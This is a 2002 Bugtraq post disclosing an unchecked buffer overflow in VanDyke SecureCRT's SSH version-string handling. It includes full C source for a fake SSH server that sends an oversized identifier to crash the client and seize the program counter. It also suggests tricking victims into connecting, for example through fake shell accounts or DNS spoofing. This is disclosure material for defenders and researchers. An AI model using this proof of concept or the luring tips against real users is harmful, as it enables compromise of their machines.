Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Arbitrary Code Execution Vulnerability in VanDyke SecureCRT 3.4 & 4.0 beta

From: Kyuzo <ogl () SirDrinkalot rm-f net>
Date: Mon, 22 Jul 2002 20:09:44 -0700
SecureCRT (http://www.vandyke.com/products/securecrt/) seems to have a bug in a
seemlingly trivial portion of its SSH connection code.  When an SSH Client
connects to a server, the server sends a version string containing minor and
major numbers for the protocol, as well as a server-specific identifier string
which is specified to be no more than 40 bytes long.  Unfortunetly the SecureCRT
code which handles errors relating to an unsupported protocol version contains
an unchecked buffer overflow when dealing with this identifier string.

The following C code is given to reproduce this bug (yes I know Perl would have
been shorter, sorry):

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define PORT 9988

int main(int argc, char **argv) {
    int s, n, i, sz = sizeof(struct sockaddr_in);
    struct sockaddr_in local, whatever;
    char payload[510];

    strcpy(payload, "SSH-1.1-");
    for (i = 8; i < 508; i++)
        payload[i] = 'A';
    payload[508] = '\n';
    payload[509] = '\0';

    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket");
        return 1;
    }
    local.sin_family = AF_INET;
    local.sin_port = htons(PORT);
    local.sin_addr.s_addr = INADDR_ANY;
    memset(&(local.sin_zero), 0, 8);
    if (bind(s, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1) {
        perror("bind");
        return 1;
    }
    if (listen(s, 2) == -1)  {
        perror("listen");
        return 1;
    }
    printf("waiting for connection...\n");
    if ((n = accept(s, (struct sockaddr *)&whatever, &sz)) == -1) {
        perror("accept");
        return 1;
    }
    printf("client connected\n");
    if (send(n, payload, sizeof(payload) - 1, 0) == -1) {
        perror("send");
        return 1;
    }
    printf("sent string: [%s]\n", payload);
    close(n);
    close(s);
    return 0;
}

After starting the (fake) server, run the SecureCRT client, attach a debugger
and connect.  Notice the value of PC is now 0x41414141...coincidence?

There are a number of ways to trick people into connecting to your ssh server,
i.e. telling them you've given them an account on your shell, dns spoofing etc.

    Big shout-out to Lagow, Biggie Smalls (up in heaven),
    Gweeds, & the whole Mr. Mittens crew

        - Kyuzo
Previous By Date Next
Previous By Thread Next

Current thread: